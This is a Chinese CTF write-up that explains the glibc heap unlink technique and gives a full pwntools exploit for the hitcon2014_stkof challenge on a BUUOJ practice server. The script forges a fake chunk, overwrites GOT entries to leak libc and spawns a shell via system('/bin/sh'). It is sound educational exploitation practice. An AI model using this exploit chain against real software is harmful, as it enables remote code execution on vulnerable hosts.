首先来说说unlink,原理可以在网站上都能看到,总结一下就是:能将指向某chunk的ptr指针指向ptr-0x18的地方。
而所需要的条件是:可以改smallbin或者unsortedbin的fd和bk指针,和一个指向执行溢出chunk的一个指针。
具体的看题目
hitcon2014_stkof
这个程序没有show的功能,然后漏洞点是在上图函数中,::s解释一下,就是说变量s已经用过了,::s就是一个新变量。后面就是一个无限溢出的漏洞。因为没有show功能,而且是Partial RELRO,可以想到的是改申请以下部分,即申请完堆块后堆地址所放的地方。
from LibcSearcher import *
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
elf=ELF('/home/hacker/Desktop/stkof' )
p=remote("node4.buuoj.cn",28941)
#p=process('/home/hacker/Desktop/stkof' )
def allocated(size):
p.sendline('1')
p.sendline(str(size))
p.recvuntil("OK")
def delete(idx):
p.sendline('3')
p.sendline(str(idx))
def edit(idx,content):
p.sendline('2')
p.sendline(str(idx))
p.sendline(str(len(content)))
p.send(content)
p.recvuntil("OK")
allocated(0x10)
allocated(0x20)
#gdb.attach(p)
#pause()
allocated(0x90)
fd = 0x602138
bk = 0x602140
payload = p64(0) + p64(0x21) + p64(fd) + p64(bk) + p64(0x20) + p64(0xa0)
#gdb.attach(p)
#pause()
edit(2,payload)
#gdb.attach(p)
#pause()
delete(3)
payload2 = p64(0)*2 + p64(elf.got['free']) + p64(elf.got['puts']) + p64(elf.got['atoi'])
#gdb.attach(p)
#pause()
edit(2,payload2)
payload3 = p64(elf.plt['puts'])
edit(1,payload3)
delete(2)
p.recvuntil('\x0a')
p.recvuntil('\x0a')
puts_addr = u64(p.recv(6).ljust(8,"\x00"))
print("puts_addr:",hex(puts_addr))
system_offset = 0x453a0
puts_offset = 0x6f6a0
libc_addr = puts_addr - puts_offset
print("libc_addr:",libc_addr)
system_addr = system_offset + libc_addr
edit(3,p64(system_addr))
p.sendline("/bin/sh\x00")
p.interactive()
本题思路为,先申请三个堆块,在堆块2内放一个fakechunk,而fakechunk又是在伪造的双链表中的,是为了和chunk3来合并的,只要free了chunk3,触发合并机制,fakechunk脱链,就可以触发unlink了,本题的注意点是:chunk3的prevsize需要=fakechunk的size,chunk3的previnuse位需要为0。